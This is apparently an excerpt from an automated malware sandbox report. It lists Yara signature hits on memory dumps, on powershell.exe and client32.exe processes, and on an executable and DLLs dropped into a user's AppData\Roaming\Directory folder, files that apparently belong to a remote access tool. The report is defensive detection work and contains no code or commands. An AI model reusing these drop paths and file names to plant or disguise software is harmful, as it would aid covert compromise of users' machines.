Source: Yara match File source: 0000001D.00000002.2022624501.000000006C090000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.2021848504.0000000011193000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.1973644487.0000000011193000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.1890861207.0000000000F92000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.1891623943.0000000011193000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6328, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: client32.exe PID: 5784, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: client32.exe PID: 3244, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: client32.exe PID: 4772, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Roaming\Directory\pcicapi.dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\Directory\client32.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\Directory\HTCTL32.DLL, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\Directory\PCICHEK.DLL, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\Directory\TCCTL32.DLL, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\Directory\PCICL32.DLL, type: DROPPED